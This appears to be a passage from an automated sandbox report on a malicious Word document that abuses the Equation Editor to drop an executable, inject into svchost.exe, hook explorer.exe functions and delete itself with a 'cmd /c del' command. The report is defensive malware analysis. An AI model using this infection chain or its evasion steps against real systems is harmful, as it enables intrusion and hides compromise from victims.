          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A173538_2_00A17353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A454858_2_00A45485
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A214898_2_00A21489
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A4D47D8_2_00A4D47D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A2C5F08_2_00A2C5F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A1351F8_2_00A1351F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A146808_2_00A14680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A1E6C18_2_00A1E6C1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AB26228_2_00AB2622
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A1C7BC8_2_00A1C7BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A9579A8_2_00A9579A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A457C38_2_00A457C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AAF8EE8_2_00AAF8EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A3286D8_2_00A3286D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A1C85C8_2_00A1C85C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A129B28_2_00A129B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AB098E8_2_00AB098E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A269FE8_2_00A269FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A959558_2_00A95955
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AC3A838_2_00AC3A83
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00ABCBA48_2_00ABCBA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A9DBDA8_2_00A9DBDA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0FBD78_2_00A0FBD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A37B008_2_00A37B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AAFDDD8_2_00AAFDDD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A40D3B8_2_00A40D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A1CD5B8_2_00A1CD5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A42E2F8_2_00A42E2F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A2EE4C8_2_00A2EE4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A20F3F8_2_00A20F3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A3DF7C8_2_00A3DF7C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009E5B08_2_0009E5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00082D8B8_2_00082D8B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00082D908_2_00082D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009EE3B8_2_0009EE3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00089E4B8_2_00089E4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00089E508_2_00089E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009EF5C8_2_0009EF5C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00082FB08_2_00082FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A0DF5C appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A7F970 appears 81 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A53F92 appears 108 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A5373B appears 238 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A0E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: String function: 00A7DF5C appears 83 times
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: String function: 00AEF970 appears 68 times
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: String function: 00AC373B appears 184 times
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: String function: 00AC3F92 appears 63 times
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A350 NtCreateFile,6_2_0041A350
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A400 NtReadFile,6_2_0041A400
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A480 NtClose,6_2_0041A480
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A530 NtAllocateVirtualMemory,6_2_0041A530
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A34A NtCreateFile,6_2_0041A34A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A3A3 NtReadFile,6_2_0041A3A3
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A47A NtClose,6_2_0041A47A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A52B NtAllocateVirtualMemory,6_2_0041A52B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A700C4 NtCreateFile,LdrInitializeThunk,6_2_00A700C4
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A70078 NtResumeThread,LdrInitializeThunk,6_2_00A70078
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A70048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_00A70048
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6F9F0 NtClose,LdrInitializeThunk,6_2_00A6F9F0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6F900 NtReadFile,LdrInitializeThunk,6_2_00A6F900
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_00A6FAE8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_00A6FAD0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_00A6FBB8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00A6FB68
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_00A6FC90
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FC60 NtMapViewOfSection,LdrInitializeThunk,6_2_00A6FC60
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FD8C NtDelayExecution,LdrInitializeThunk,6_2_00A6FD8C
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00A6FDC0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_00A6FEA0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_00A6FED0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FFB4 NtCreateSection,LdrInitializeThunk,6_2_00A6FFB4
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A710D0 NtOpenProcessToken,6_2_00A710D0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A70060 NtQuerySection,6_2_00A70060
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A701D4 NtSetValueKey,6_2_00A701D4
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A7010C NtOpenDirectoryObject,6_2_00A7010C
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A71148 NtOpenThread,6_2_00A71148
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A707AC NtCreateMutant,6_2_00A707AC
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6F8CC NtWaitForSingleObject,6_2_00A6F8CC
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A71930 NtSetContextThread,6_2_00A71930
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6F938 NtWriteFile,6_2_00A6F938
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FAB8 NtQueryValueKey,6_2_00A6FAB8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FA20 NtQueryInformationFile,6_2_00A6FA20
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FA50 NtEnumerateValueKey,6_2_00A6FA50
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FBE8 NtQueryVirtualMemory,6_2_00A6FBE8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FB50 NtCreateKey,6_2_00A6FB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A000C4 NtCreateFile,LdrInitializeThunk,8_2_00A000C4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A007AC NtCreateMutant,LdrInitializeThunk,8_2_00A007AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FF9F0 NtClose,LdrInitializeThunk,8_2_009FF9F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FF900 NtReadFile,LdrInitializeThunk,8_2_009FF900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFAB8 NtQueryValueKey,LdrInitializeThunk,8_2_009FFAB8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_009FFAD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_009FFAE8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_009FFBB8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFB50 NtCreateKey,LdrInitializeThunk,8_2_009FFB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_009FFB68
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,8_2_009FFC60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFD8C NtDelayExecution,LdrInitializeThunk,8_2_009FFD8C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_009FFDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_009FFED0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFFB4 NtCreateSection,LdrInitializeThunk,8_2_009FFFB4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A010D0 NtOpenProcessToken,8_2_00A010D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A00060 NtQuerySection,8_2_00A00060
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A00078 NtResumeThread,8_2_00A00078
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A00048 NtProtectVirtualMemory,8_2_00A00048
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A001D4 NtSetValueKey,8_2_00A001D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0010C NtOpenDirectoryObject,8_2_00A0010C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A01148 NtOpenThread,8_2_00A01148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FF8CC NtWaitForSingleObject,8_2_009FF8CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A01930 NtSetContextThread,8_2_00A01930
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FF938 NtWriteFile,8_2_009FF938
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFA20 NtQueryInformationFile,8_2_009FFA20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFA50 NtEnumerateValueKey,8_2_009FFA50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFBE8 NtQueryVirtualMemory,8_2_009FFBE8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFC90 NtUnmapViewOfSection,8_2_009FFC90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFC30 NtOpenProcess,8_2_009FFC30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFC48 NtSetInformationFile,8_2_009FFC48
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A00C40 NtGetContextThread,8_2_00A00C40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A01D80 NtSuspendThread,8_2_00A01D80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFD5C NtEnumerateKey,8_2_009FFD5C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFEA0 NtReadVirtualMemory,8_2_009FFEA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFE24 NtWriteVirtualMemory,8_2_009FFE24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFFFC NtCreateProcessEx,8_2_009FFFFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFF34 NtQueueApcThread,8_2_009FFF34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A350 NtCreateFile,8_2_0009A350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A400 NtReadFile,8_2_0009A400
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A480 NtClose,8_2_0009A480
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A530 NtAllocateVirtualMemory,8_2_0009A530
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A34A NtCreateFile,8_2_0009A34A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A3A3 NtReadFile,8_2_0009A3A3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A47A NtClose,8_2_0009A47A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A52B NtAllocateVirtualMemory,8_2_0009A52B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: ibefrankszx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ibeframnk863.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: PO.docVirustotal: Detection: 43%
          Source: PO.docReversingLabs: Detection: 28%
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE2CF.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@12/8@3/3
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: ibeframnk863.exe, svchost.exe
          Source: Binary string: svchost.pdb source: ibeframnk863.exe, 00000006.00000002.505477626.00000000006A1000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: ibefrankszx[1].exe.2.dr, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ibeframnk863.exe.2.dr, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E6B84 push dword ptr [ebp-17000000h]; iretd 4_2_002E6B8A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E4DE8 pushfd ; retf 4_2_002E4DE9
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0040E3CE push esi; iretd 6_2_0040E3D6
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00417C03 push edi; iretd 6_2_00417C19
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0040E419 push ds; ret 6_2_0040E41C
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041D4F2 push eax; ret 6_2_0041D4F8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041D4FB push eax; ret 6_2_0041D562
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00417C80 push edi; iretd 6_2_00417C19
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041D4A5 push eax; ret 6_2_0041D4F8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041D55C push eax; ret 6_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0DFA1 push ecx; ret 8_2_00A0DFB4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0008E3CE push esi; iretd 8_2_0008E3D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0008E419 push ds; ret 8_2_0008E41C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009D4A5 push eax; ret 8_2_0009D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009D4FB push eax; ret 8_2_0009D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009D4F2 push eax; ret 8_2_0009D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009D55C push eax; ret 8_2_0009D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009D7C1 pushfd ; iretd 8_2_0009D7C2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00097C03 push edi; iretd 8_2_00097C19
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00097C80 push edi; iretd 8_2_00097C19
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009DD5E push eax; ret 8_2_0009DD60
          Source: initial sampleStatic PE information: section name: .text entropy: 7.14505383023
          Source: initial sampleStatic PE information: section name: .text entropy: 7.14505383023
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE9
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
